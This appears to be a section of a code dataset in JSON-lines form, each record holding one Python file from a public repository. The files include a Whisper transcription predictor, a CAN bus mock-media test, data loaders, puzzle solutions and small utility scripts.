DocoptExit\n\nfrom . import create_gif\n\nif __name__ == \"__main__\":\n arguments: dict = docopt(__doc__, version=\"0.1.0\")\n target_format = arguments[\"--format\"].lower()\n if target_format not in [\"gif\"]:\n raise DocoptExit(f\"{target_format} is not one of the recognized formats: 'gif'\")\n if target_format == \"gif\":\n create_gif(arguments[\"\"], arguments[\"--output\"])\n","repo_name":"MusicOnline/kanimaji3","sub_path":"kanimaji3/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18474241305","text":"from collections.abc import Iterable\nfrom pathlib import Path\nfrom typing import Optional\n\n\nimport cv2\nimport numpy as np\nimport numpy.typing as npt\n\nfrom src.torch_utils.utils.misc import clean_print\n\n\ndef default_loader(data_path: Path,\n label_map: dict[int, str],\n limit: Optional[int] = None,\n shuffle: bool = False,\n verbose: bool = True\n ) -> tuple[npt.NDArray[np.object_], npt.NDArray[np.int64]]:\n \"\"\"Default loading function for image classification.\n\n The data folder is expected to contain subfolders for each class, with the images inside.\n\n Args:\n data_path (Path): Path to the root folder of the dataset.\n label_map (dict): dictionarry mapping an int to a class\n limit (int, optional): If given then the number of elements for each class in the dataset\n will be capped to this number\n shuffle (bool): If true then the data is shuffled once before being returned\n verbose (bool): Verbose mode, print loading progress.\n\n Return:\n 2 numpy arrays, one containing the images' paths and the other containing the labels.\n \"\"\"\n labels: npt.NDArray[np.int64] = np.empty(0, dtype=np.int64)\n data: npt.NDArray[np.object_] = np.empty(0, dtype=Path)\n exts = (\".png\", \".jpg\", \".bmp\")\n for key in range(len(label_map)):\n class_dir_path = data_path / label_map[key]\n img_paths: list[Path] = [path for path in class_dir_path.rglob('*') if path.suffix in exts]\n for i, img_path in enumerate(img_paths, start=1):\n if verbose:\n clean_print(f\"Processing image {img_path.name} ({i}/{len(img_paths)}) for class {label_map[key]}\",\n end=\"\\r\" if (i != len(img_paths) and i != limit) else \"\\n\")\n data = np.append(data, img_path) # type: ignore\n labels = np.append(labels, key)\n if limit and i >= limit:\n break\n\n data, 
labels = np.asarray(data), np.asarray(labels)\n if shuffle:\n index_list = np.arange(len(labels), dtype=np.int64)\n np.random.shuffle(index_list)\n data, labels, = data[index_list], labels[index_list]\n\n return data, labels\n\n\ndef default_load_data(data: Path | Iterable[Path]) -> npt.NDArray[np.uint8]:\n \"\"\"Function that loads image(s) from path(s).\n\n Args:\n data (path): either an image path or a batch of image paths, and return the loaded image(s)\n\n Returns:\n Image or batch of image\n \"\"\"\n if isinstance(data, Path):\n img = cv2.imread(str(data))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img # type: ignore\n else:\n imgs = []\n for image_path in data:\n imgs.append(default_load_data(image_path))\n return np.asarray(imgs)\n\n\nif __name__ == \"__main__\":\n def _test_fn():\n from argparse import ArgumentParser\n from src.torch_utils.utils.imgs_misc import show_img\n parser = ArgumentParser(description=(\"Script to test the loading function. \"\n \"Run with 'python -m src.dataset.default_loader '\"))\n parser.add_argument(\"data_path\", type=Path, help=\"Path to a classification dataset (Train or Validation).\")\n args = parser.parse_args()\n\n data_path: Path = args.data_path\n\n label_map = {}\n with open(data_path.parent / \"classes.names\") as text_file:\n for key, line in enumerate(text_file):\n label_map[key] = line.strip()\n\n data, labels = default_loader(data_path, label_map, limit=20)\n img1, _img2 = default_load_data(data[:2])\n print(labels[0])\n show_img(img1)\n\n _test_fn()\n","repo_name":"hoel-bagard/image_classification_pytorch","sub_path":"src/dataset/default_loader.py","file_name":"default_loader.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45452151922","text":"# from sys import stdin\n# import heapq as h\n\n# input = stdin.readline\n\n# n = int(input().rstrip())\n# hardq = []\n# easyq = []\n# idx = [0] * 100001\n# for _ in range(n):\n# num, difficult = map(int, input().rstrip().split())\n# h.heappush(hardq, (-difficult, -num))\n# h.heappush(easyq, (difficult, num))\n# idx[num] = difficult\n\n# m = int(input().rstrip())\n# ans = ''\n# for _ in range(m):\n# cmd = input().rstrip().split()\n# num = int(cmd[1])\n# if cmd[0] == 'recommend':\n# # ans += str(hardq) + '\\n'\n# if num == 1:\n# ans += str(-hardq[0][1])+'\\n'\n# elif num == -1:\n# ans += str(easyq[0][1])+'\\n'\n# elif cmd[0] == 'add':\n# difficult = int(cmd[2])\n# h.heappush(hardq, (-difficult, -num))\n# h.heappush(easyq, (difficult, num))\n# idx[num] = difficult\n# elif cmd[0] == 'solved':\n# easyq.remove((idx[num], num))\n# hardq.remove((-idx[num], -num))\n# idx[num] = 0\n# print(ans)\n\nimport sys\ninput = sys.stdin.readline\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\n\nN = int(input())\nmin_heap = []\nmax_heap = []\nin_list = defaultdict(bool)\nfor _ in range(N):\n P, L = map(int, input().split())\n heappush(min_heap,[L,P])\n heappush(max_heap,[-L,-P])\n in_list[P] = True\n\nM = int(input())\nfor _ in range(M):\n command = input().split()\n if command[0]=='recommend':\n if command[1]=='1':\n while not in_list[-max_heap[0][1]]:\n heappop(max_heap)\n print(-max_heap[0][1])\n else:\n while not in_list[min_heap[0][1]]:\n heappop(min_heap)\n print(min_heap[0][1])\n elif command[0]=='solved':\n in_list[int(command[1])] = False\n else:\n P = int(command[1])\n L = int(command[2])\n # 같은 번호의 다른 난이도 문제가 삽입되어 이미 죽은 문제인데 True로 나와 출력되는 것을 방지.\n while not 
in_list[-max_heap[0][1]]:\n heappop(max_heap)\n while not in_list[min_heap[0][1]]:\n heappop(min_heap)\n in_list[P] = True\n heappush(max_heap,[-L,-P])\n heappush(min_heap,[L,P])","repo_name":"Acver14/forCodingTest","sub_path":"before 2022.04.27/BaekJoon/DataStructure/Python/21939.py","file_name":"21939.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73972643441","text":"import math\nimport re\nimport sys\nfrom collections import defaultdict\n\ndef runit(prog):\n acc = 0\n pc = 0\n second = defaultdict(int)\n\n while pc < len(prog):\n second[pc] = second[pc] +1\n if(second[pc] == 2):\n# print(acc)\n return False\n\n (instr, para) = prog[pc]\n if(instr==\"nop\"):\n pc=pc+1\n if(instr==\"jmp\"):\n pc=pc+para\n if(instr==\"acc\"):\n pc=pc+1\n acc=acc+para\n\n print(acc)\n return True\n\ndef main():\n\n acc = 0\n prog = []\n pc = 0\n\n\n with open('day8.txt') as f:\n lines = f.readlines()\n for l in lines:\n (instr, para) = l.strip().split(\" \")\n prog.append((instr, int(para)))\n\n for i in range(len(prog)):\n perm = prog[:]\n (instr, para) = perm[i]\n if(instr==\"nop\"):\n instr=\"jmp\"\n if(instr==\"jmp\"):\n instr = \"nop\"\n if(instr==\"acc\"):\n pass\n perm[i] = (instr,para)\n r = runit(perm)\n if(r):\n print(i)\n\n\n\n\n\n\n\nif __name__ ==\"__main__\":\n main()\n\n","repo_name":"ghosthugger/aoc2020","sub_path":"day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21411880015","text":"from __future__ import annotations\nimport typing\nimport asyncio\nimport pytest\nimport pycyphal.transport\nfrom pycyphal.transport import Timestamp\nfrom pycyphal.transport.can.media import Media, Envelope, FilterConfiguration, DataFrame, FrameFormat\n\npytestmark = pytest.mark.asyncio\n\n\nclass MockMedia(Media):\n def __init__(self, peers: typing.Set[MockMedia], mtu: int, number_of_acceptance_filters: int):\n self._peers = peers\n peers.add(self)\n\n self._mtu = int(mtu)\n\n self._rx_handler: Media.ReceivedFramesHandler = lambda _: None # pragma: no cover\n self._acceptance_filters = [\n self._make_dead_filter() # By default drop (almost) all frames\n for _ in range(int(number_of_acceptance_filters))\n ]\n self._automatic_retransmission_enabled = False # This is the default per the media interface spec\n self._closed = False\n\n self._raise_on_send_once: typing.Optional[Exception] = None\n\n super().__init__()\n\n @property\n def loop(self) -> asyncio.AbstractEventLoop:\n return asyncio.get_event_loop()\n\n @property\n def interface_name(self) -> str:\n return f\"mock@{id(self._peers):08x}\"\n\n @property\n def mtu(self) -> int:\n return self._mtu\n\n @property\n def number_of_acceptance_filters(self) -> int:\n return len(self._acceptance_filters)\n\n def start(self, handler: Media.ReceivedFramesHandler, no_automatic_retransmission: bool) -> None:\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n assert callable(handler)\n self._rx_handler = handler\n assert isinstance(no_automatic_retransmission, bool)\n self._automatic_retransmission_enabled = not no_automatic_retransmission\n\n def configure_acceptance_filters(self, configuration: typing.Sequence[FilterConfiguration]) -> None:\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n configuration = list(configuration) # Do not mutate the argument\n while len(configuration) < 
len(self._acceptance_filters):\n configuration.append(self._make_dead_filter())\n\n assert len(configuration) == len(self._acceptance_filters)\n self._acceptance_filters = configuration\n\n @property\n def automatic_retransmission_enabled(self) -> bool:\n return self._automatic_retransmission_enabled\n\n @property\n def acceptance_filters(self) -> typing.List[FilterConfiguration]:\n return list(self._acceptance_filters)\n\n async def send(self, frames: typing.Iterable[Envelope], monotonic_deadline: float) -> int:\n del monotonic_deadline # Unused\n if self._closed:\n raise pycyphal.transport.ResourceClosedError\n\n if self._raise_on_send_once:\n self._raise_on_send_once, ex = None, self._raise_on_send_once\n assert isinstance(ex, Exception)\n raise ex\n\n frames = list(frames)\n assert len(frames) > 0, \"Interface constraint violation: empty transmission set\"\n assert min(map(lambda x: len(x.frame.data), frames)) >= 1, \"CAN frames with empty payload are not valid\"\n # The media interface spec says that it is guaranteed that the CAN ID is the same across the set; enforce this.\n assert len(set(map(lambda x: x.frame.identifier, frames))) == 1, \"Interface constraint violation: nonuniform ID\"\n\n timestamp = Timestamp.now()\n\n # Broadcast across the virtual bus we're emulating here.\n for p in self._peers:\n if p is not self:\n # Unconditionally clear the loopback flag because for the other side these are\n # regular received frames, not loopback frames.\n p._receive( # pylint: disable=protected-access\n (timestamp, Envelope(f.frame, loopback=False)) for f in frames\n )\n\n # Simple loopback emulation with acceptance filtering.\n self._receive((timestamp, f) for f in frames if f.loopback)\n return len(frames)\n\n def close(self) -> None:\n if not self._closed:\n self._closed = True\n self._peers.remove(self)\n\n def raise_on_send_once(self, ex: Exception) -> None:\n self._raise_on_send_once = ex\n\n def inject_received(self, frames: typing.Iterable[typing.Union[Envelope, DataFrame]]) -> None:\n timestamp = Timestamp.now()\n self._receive(\n (\n timestamp,\n (f if isinstance(f, Envelope) else Envelope(frame=f, loopback=False)),\n )\n for f in frames\n )\n\n def _receive(self, frames: typing.Iterable[typing.Tuple[Timestamp, Envelope]]) -> None:\n frames = list(filter(lambda item: self._test_acceptance(item[1].frame), frames))\n if frames: # Where are the assignment expressions when you need them?\n self._rx_handler(frames)\n\n def _test_acceptance(self, frame: DataFrame) -> bool:\n return any(\n map(\n lambda f: frame.identifier & f.mask == f.identifier & f.mask\n and (f.format is None or frame.format == f.format),\n self._acceptance_filters,\n )\n )\n\n @staticmethod\n def list_available_interface_names() -> typing.Iterable[str]:\n return [] # pragma: no cover\n\n @staticmethod\n def _make_dead_filter() -> FilterConfiguration:\n fmt = FrameFormat.BASE\n return FilterConfiguration(0, 2 ** int(fmt) - 1, fmt)\n\n\nasync def _unittest_can_mock_media() -> None:\n peers: typing.Set[MockMedia] = set()\n\n me = MockMedia(peers, 64, 3)\n assert len(peers) == 1 and me in peers\n assert me.mtu == 64\n assert me.number_of_acceptance_filters == 3\n assert not me.automatic_retransmission_enabled\n assert str(me) == f\"MockMedia('mock@{id(peers):08x}', mtu=64)\"\n\n me_collector = FrameCollector()\n me.start(me_collector.give, False)\n assert me.automatic_retransmission_enabled\n\n # Will drop the loopback because of the acceptance filters\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 
123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert me_collector.empty\n\n me.configure_acceptance_filters([FilterConfiguration.new_promiscuous()])\n # Now the loopback will be accepted because we have reconfigured the filters\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert me_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\"))\n assert me_collector.empty\n\n pe = MockMedia(peers, 8, 1)\n assert peers == {me, pe}\n\n pe_collector = FrameCollector()\n pe.start(pe_collector.give, False)\n\n me.raise_on_send_once(RuntimeError(\"Hello world!\"))\n with pytest.raises(RuntimeError, match=\"Hello world!\"):\n await me.send([], asyncio.get_event_loop().time() + 1.0)\n\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert pe_collector.empty\n\n pe.configure_acceptance_filters([FilterConfiguration(123, 127, None)])\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\")), loopback=False),\n Envelope(DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\")), loopback=True),\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n await me.send(\n [\n Envelope(DataFrame(FrameFormat.EXTENDED, 456, bytearray(b\"ghi\")), loopback=False), # Dropped by the filters\n ],\n asyncio.get_event_loop().time() + 1.0,\n )\n assert pe_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"abc\"))\n assert pe_collector.pop()[1].frame == DataFrame(FrameFormat.EXTENDED, 123, bytearray(b\"def\"))\n assert pe_collector.empty\n\n me.close()\n me.close() # Idempotency.\n assert peers == {pe}\n with pytest.raises(pycyphal.transport.ResourceClosedError):\n await me.send([], asyncio.get_event_loop().time() + 1.0)\n with pytest.raises(pycyphal.transport.ResourceClosedError):\n me.configure_acceptance_filters([])\n await asyncio.sleep(1) # Let all pending tasks finalize properly to avoid stack traces in the output.\n\n\nclass FrameCollector:\n def __init__(self) -> None:\n self._collected: typing.List[typing.Tuple[Timestamp, Envelope]] = []\n\n def give(self, frames: typing.Iterable[typing.Tuple[Timestamp, Envelope]]) -> None:\n frames = list(frames)\n assert all(map(lambda x: isinstance(x[0], Timestamp) and isinstance(x[1], Envelope), frames))\n self._collected += frames\n\n def pop(self) -> typing.Tuple[Timestamp, Envelope]:\n head, *self._collected = self._collected\n return head\n\n @property\n def empty(self) -> bool:\n return len(self._collected) == 0\n\n def __repr__(self) -> str: # pragma: no cover\n return f\"{type(self).__name__}({str(self._collected)})\"\n","repo_name":"OpenCyphal/pycyphal","sub_path":"tests/transport/can/media/mock/_media.py","file_name":"_media.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"75"} +{"seq_id":"3583636164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport tinymce.models\n\n\nclass 
Migration(migrations.Migration):\n dependencies = [\n (\"eventos\", \"0013_modelodeclaracao\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"modelodeclaracao\",\n name=\"texto\",\n field=tinymce.models.HTMLField(\n help_text=\"Use as seguintes marca\\xe7\\xf5es:
  • {{ casa.nome }} para o nome da Casa Legislativa / \\xf3rg\\xe3o
  • {{ casa.municipio.uf.sigla }} para a sigla da UF da Casa legislativa
  • {{ nome }} para o nome do visitante
  • {{ data }} para a data de emiss\\xe3o da declara\\xe7\\xe3o
  • {{ evento.data_inicio }} para a data/hora do in\\xedcio da visita
  • {{ evento.data_termino }} para a data/hora do t\\xe9rmino da visita
  • {{ evento.nome }} para o nome do evento
  • {{ evento.descricao }} para a descri\\xe7\\xe3o do evento
\",\n verbose_name=\"Texto da declara\\xe7\\xe3o\",\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"interlegis/sigi","sub_path":"sigi/apps/eventos/migrations/0014_auto_20211124_0736.py","file_name":"0014_auto_20211124_0736.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"pt","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"40026185048","text":"ans = ''\n\ndef all_pop(stack, bracket, mul):\n global ans\n while len(stack) > 0:\n tmp = stack.pop()\n if mul and (tmp == '+' or tmp == '-'):\n stack.append(tmp)\n return\n if tmp == '(' and bracket:\n return\n elif tmp == '(':\n stack.append('(')\n return\n else:\n ans += tmp\n\n\nexp = input()\n\nindex = 0\n\nstack = []\n\nans = ''\n\nwhile index < len(exp):\n \n oper = exp[index]\n\n if oper == '+' or oper == '-':\n all_pop(stack, False, False)\n stack.append(oper)\n\n elif oper == '(':\n stack.append(oper)\n\n elif oper == '*' or oper == '/':\n if len(stack) > 0 and (stack[-1] == '*' or stack[-1] == '/'):\n all_pop(stack, False, True)\n stack.append(oper)\n\n elif oper == ')':\n all_pop(stack, True, False)\n\n else:\n ans += oper\n\n index += 1\n\nall_pop(stack, False, False)\n\nprint(ans)\n\n","repo_name":"jintak0401/Problem_Solving","sub_path":"1918.py","file_name":"1918.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36147901914","text":"import textract\nfrom fpdf import FPDF\n\n# Extract text from word document\ntext = textract.process(\"original.docx\").decode(\"utf-8\")\n# text = textract.process(\"template.pdf\").decode(\"utf-8\")\npdf = FPDF()\npdf.add_font('Arial Unicode', '', 'Arial Unicode MS Font.ttf', uni=True)\npdf.set_font(\"Arial Unicode\", size=12)\n\n# Replace the old text with the new text\ntext = text.replace(\"offer_to\", \"new text\")\n\n# Create a new pdf document\npdf.add_page()\npdf.multi_cell(0, 10, txt=text)\npdf.output(\"modified.pdf\")\n","repo_name":"Nick-X-Mar/Sylor","sub_path":"endpoints/pdf_management/pdfminer.py","file_name":"pdfminer.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73344346802","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nimport os.path\n\nlista_asistencia=[]\nclass Asistencias(BoxLayout):\n\tdef guardar(self,nombre):\n\t\tlista_asistencia.append(nombre)\n\t\tprint (lista_asistencia)\n\tdef exportar(self):\t\n\t\tBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\t\tdb_path = os.path.join(BASE_DIR, \"Asistencias.txt\")\t\n\t\tarchi=open(db_path,'a')\n\t\tfor x in lista_asistencia:\n\t\t\tarchi.write(x+\" \")\n\t\t\tarchi.write(\"\\n\")\n\t\tarchi.close()\nclass RegistrosAPP(App):\t\n\tdef build(self):\n\t\tregistro = Asistencias()\n\t\treturn registro\n\nif __name__ == \"__main__\":\n RegistrosAPP().run()\n","repo_name":"eliecer11/Uip-prog3","sub_path":"Tareas/tarea7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16245008866","text":"\"\"\"\ndownload the models to ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/65147644a518d12f04e32d6f3b26facc3f8dd46e5390956a9424a650c0ce22b9/tiny.pt -P ./weights\nwget 
https://openaipublic.azureedge.net/main/whisper/models/ed3a0b6b1c0edf879ad9b11b1af5a0e6ab5db9205f891f668f8b0e6c6326e34e/base.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/9ecf779972d90ba49c06d968637d720dd632c55bbf19d441fb42bf17a411e794/small.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/345ae4da62f9b3d59415adc60127b97c714f32e89e936602e85993674d08dcb1/medium.pt -P ./weights\nwget https://openaipublic.azureedge.net/main/whisper/models/e4b87e7e0bf463eb8e6956e646f1e277e901512310def2c24bf0e11bd3c28e9a/large.pt -P ./weights\n\"\"\"\n\nimport io\nimport os\nfrom typing import Optional, Any\nimport torch\nimport numpy as np\nfrom cog import BasePredictor, Input, Path, BaseModel\n\nimport whisper\nfrom whisper.model import Whisper, ModelDimensions\nfrom whisper.tokenizer import LANGUAGES, TO_LANGUAGE_CODE\nfrom whisper.utils import format_timestamp\n\n\nclass ModelOutput(BaseModel):\n detected_language: str\n transcription: str\n segments: Any\n translation: Optional[str]\n txt_file: Optional[Path]\n srt_file: Optional[Path]\n\n\nclass Predictor(BasePredictor):\n def setup(self):\n \"\"\"Load the model into memory to make running multiple predictions efficient\"\"\"\n\n self.models = {}\n for model in [\"tiny\", \"base\", \"small\", \"medium\", \"large\"]:\n model_bytes = open(f\"weights/{model}.pt\", \"rb\").read()\n with io.BytesIO(model_bytes) as fp:\n checkpoint = torch.load(fp, map_location=\"cpu\")\n\n dims = ModelDimensions(**checkpoint[\"dims\"])\n state_dict = checkpoint[\"model_state_dict\"]\n self.models[model] = Whisper(dims)\n self.models[model].load_state_dict(state_dict)\n\n def predict(\n self,\n audio: Path = Input(description=\"Audio file\"),\n model: str = Input(\n default=\"base\",\n choices=[\"tiny\", \"base\", \"small\", \"medium\", \"large\"],\n description=\"Choose a Whisper model.\",\n ),\n transcription: str = Input(\n choices=[\"plain text\", \"srt\", \"vtt\"],\n default=\"plain text\",\n description=\"Choose the format for the transcription\",\n ),\n translate: bool = Input(\n default=False,\n description=\"Translate the text to English when set to True\",\n ),\n language: str = Input(\n choices=sorted(LANGUAGES.keys()) + sorted([k.title() for k in TO_LANGUAGE_CODE.keys()]),\n default=None,\n description=\"language spoken in the audio, specify None to perform language detection\",\n ),\n temperature: float = Input(\n default=0,\n description=\"temperature to use for sampling\",\n ),\n patience: float = Input(\n default=None,\n description=\"optional patience value to use in beam decoding, as in https://arxiv.org/abs/2204.05424, the default (1.0) is equivalent to conventional beam search\",\n ),\n suppress_tokens: str = Input(\n default=\"-1\",\n description=\"comma-separated list of token ids to suppress during sampling; '-1' will suppress most special characters except common punctuations\",\n ),\n initial_prompt: str = Input(\n default=None,\n description=\"optional text to provide as a prompt for the first window.\",\n ),\n condition_on_previous_text: bool = Input(\n default=True,\n description=\"if True, provide the previous output of the model as a prompt for the next window; disabling may make the text inconsistent across windows, but the model becomes less prone to getting stuck in a failure loop\",\n ),\n temperature_increment_on_fallback: float = Input(\n default=0.2,\n description=\"temperature to increase when falling back when the decoding fails to meet either of the thresholds below\",\n ),\n 
compression_ratio_threshold: float = Input(\n default=2.4,\n description=\"if the gzip compression ratio is higher than this value, treat the decoding as failed\",\n ),\n logprob_threshold: float = Input(\n default=-1.0,\n description=\"if the average log probability is lower than this value, treat the decoding as failed\",\n ),\n no_speech_threshold: float = Input(\n default=0.6,\n description=\"if the probability of the <|nospeech|> token is higher than this value AND the decoding has failed due to `logprob_threshold`, consider the segment as silence\",\n ),\n ) -> ModelOutput:\n\n \"\"\"Run a single prediction on the model\"\"\"\n print(f\"Transcribe with {model} model\")\n model = self.models[model].to(\"cuda\")\n\n if temperature_increment_on_fallback is not None:\n temperature = tuple(np.arange(temperature, 1.0 + 1e-6, temperature_increment_on_fallback))\n else:\n temperature = [temperature]\n\n args = {\n \"language\": language,\n \"patience\": patience,\n \"suppress_tokens\": suppress_tokens,\n \"initial_prompt\": initial_prompt,\n \"condition_on_previous_text\": condition_on_previous_text,\n \"compression_ratio_threshold\": compression_ratio_threshold,\n \"logprob_threshold\": logprob_threshold,\n \"no_speech_threshold\": no_speech_threshold\n }\n\n result = model.transcribe(str(audio), temperature=temperature, **args)\n\n if transcription == \"plain text\":\n transcription = result[\"text\"]\n elif transcription == \"srt\":\n transcription = write_srt(result[\"segments\"])\n else:\n transcription = write_vtt(result[\"segments\"])\n\n if translate:\n translation = model.transcribe(str(audio), task=\"translate\", temperature=temperature, **args)\n\n return ModelOutput(\n segments=result[\"segments\"],\n detected_language=LANGUAGES[result[\"language\"]],\n transcription=transcription,\n translation=translation[\"text\"] if translate else None,\n )\n\n\ndef write_vtt(transcript):\n result = \"\"\n for segment in transcript:\n result += f\"{format_timestamp(segment['start'])} --> {format_timestamp(segment['end'])}\\n\"\n result += f\"{segment['text'].strip().replace('-->', '->')}\\n\"\n return result\n\n\ndef write_srt(transcript):\n result = \"\"\n for i, segment in enumerate(transcript, start=1):\n result += f\"{i}\\n\"\n result += f\"{format_timestamp(segment['start'], always_include_hours=True, decimal_marker=',')} --> \"\n result += f\"{format_timestamp(segment['end'], always_include_hours=True, decimal_marker=',')}\\n\"\n result += f\"{segment['text'].strip().replace('-->', '->')}\\n\"\n return result\n","repo_name":"playgroundjohn/cog-whisper","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":7010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"25732267565","text":"import math\nimport matplotlib.pylab as grafica\n\n\nclass dB():\n\n def __init__(self, dB, bitDepth , frecMuestreo, frecOnda, duracion):\n # frecOnda es la frecuencia deseada\n # 1 / 44100 = 2.26 x 10 ^ -5 es el periodo de muestreo\n # 2seg * 44100 = 88200 muestras\n self.dBFs = dB\n self.bitDepth = bitDepth\n self.muestras = 1 / ( float(frecMuestreo) )\n self.frecOnda = frecOnda\n self.tiempo = int( duracion * frecMuestreo )\n\n def amplitud(self):\n valorPico = ( (2 ** self.bitDepth)/2 ) * ( 10 ** (self.dBFs/10) ) ** (0.5)\n return valorPico\n\n def procesoSenal(self, amplitud):\n arreglo = []\n for n in range(self.tiempo):\n x = amplitud * math.sin(2 * math.pi * self.frecOnda * (n * self.muestras)) # muestra a muestra\n 
arreglo.append(x)\n return arreglo\n\n def graficar(self, Arreglo):\n grafica.plot(Arreglo)\n grafica.show(Arreglo)","repo_name":"julionieto48/audio_jend","sub_path":"general audio/audio/8_sintesis/sintesis/pcm/PCM.py","file_name":"PCM.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13381649041","text":"# -*- coding: utf-8 -*-\n\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\n\nobject = pd.read_pickle(r'result_embeddings.p')\n\n# Don't print the whole file, too big.\nfor index, elems in enumerate(object):\n print(\"LLVM IR Vector : \")\n print(elems)\n if index > 10:\n break\n\n# hdfOutput = pd.read_hdf(r'classifier_inst2vec.h5')\n# print(hdfOutput)\n\nfilename = \"CLASSIFYAPP-94.83.h5\"\n\nwith h5py.File(filename, \"r\") as f:\n # List all groups\n print(\"Keys: %s\" % f.keys())\n a_group_key = list(f.keys())[0]\n\n # Get the data\n data = list(f[a_group_key])\n print(data)\n\n# Read here.\n# https: // stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python\n# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_hdf.html\n","repo_name":"lahiri-phdworks/PAVT-debloating-project","sub_path":"inst2vec-embeddings/inst2vec-logs/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"43130297096","text":"import requests\nfrom utils.http import GetRequestHeader\nimport json\n\n\ndef SendInvetoryCheckRequest(inputProductListStr):\n url = 'https://www.analog.com/client/Product/PostSampleBuyData'\n headers = GetRequestHeader()\n # print(headers)\n payload = {\n 'ProductIDList': inputProductListStr\n }\n r = requests.post(url=url, headers=headers, data=payload)\n productList = json.loads(r.text)['ModelList']\n print(productList)\n return productList\n\n\ndef CheckInventory(productList):\n placeOrderDic = {}\n for product in productList:\n placeOrderDic[product['ModelName']] = product['AnalogDevicesColumnInfo']['IsAddtoCart']\n print(placeOrderDic)\n return placeOrderDic\n\n\ndef main():\n inputProductListStr = 'LTC7000ARMSE#PBF,LTC7000ARMSE#TRPBF,LTC7000ARMSE#WPBF,LTC7000ARMSE#WTRPBF'\n productList = SendInvetoryCheckRequest(inputProductListStr)\n placeOrderDic = CheckInventory(productList)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"18820013443/chip-scrawler","sub_path":"spiders/check_inventory_spider.py","file_name":"check_inventory_spider.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36244782188","text":"import argparse\nfrom torchvision import transforms\nfrom dataset import AircraftDataset, Chest, coco, general_dataset, ISIC, omniglot, OxfordFlowers102Dataset, miniImageNet, CategoriesSampler\nfrom architectures import get_backbone, get_classifier\nimport tqdm\nimport torch\nimport torch.nn.functional as F\nfrom utils import count_acc, Averager\nimport numpy as np\nimport os\nfrom torch.utils.data import DataLoader\nimport collections\nimport math\n\nbackbones = ['resnet12', 'resnet50', 'WRN_28_10', 'conv-4', 'SEnet']\n\nclassifiers = ['proto_head', 'LR', \"metaopt\"]# LR for MoCo, S2M2; proto_head for PN, CE, Meta Baseline; metaopt for MetaOPT \n\ndatasets = ['miniImageNet', 'CUB', 'Textures', 'Traffic_Signs',\n 'Aircraft', 'Omniglot', 'VGG_Flower', 'MSCOCO', 'QuickDraw', 
